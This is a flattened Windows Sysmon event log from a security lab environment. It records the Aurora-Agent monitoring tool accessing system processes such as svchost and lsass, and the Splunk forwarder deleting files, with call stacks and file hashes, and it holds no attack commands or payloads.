Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017057Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.761{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017056Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.758{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017055Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.757{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017054Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.757{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017053Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.750{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017052Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.750{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017051Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.747{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017050Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.746{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017049Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.742{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017048Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.737{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017047Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.736{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017046Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.723{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017045Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.720{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017044Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.705{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017043Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.702{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017042Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.667{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017041Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.651{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017040Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.636{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017039Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.624{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017038Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.615{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017037Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.584{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017036Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.577{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017035Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.571{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017034Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.561{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017033Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.554{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017032Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.542{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017031Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.535{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017030Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.530{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 23542300x800000000000000017029Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.210{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD19CC2950CE977605F5DD4F74FC93A8,SHA256=76380584C45EF9D628FF85EF74EBE3EDAB7011065EA71A0156DCCF875BB9D274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:02.429{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=351C3A6815868E54B5988484835CD95D,SHA256=842FB682305E786D072CAFBDE4E2C5222EBC2770B10EA97BE59834F944CA23FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017061Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:03.763{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB3D621C0543476BA21689D408ED960C,SHA256=BD20324200AA108D2CDA9F76346CBE8A18167772EB7C77EE07B7872990D78C6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:03.545{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A43D49E98D3D8EF4C25EAF5EB06A37D1,SHA256=13F639541AD0612FFE3885B527356B390DAEB0096AE3464746837993499987B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017063Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:04.791{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D0C16E05BB1BF639AEC739B7883D823,SHA256=143196177FD359BC82E5EBDA2F63FA075C0F0316EA2750268C7598CD0FA78C28,IMPHASH=00000000000000000000000000000000falsetrue 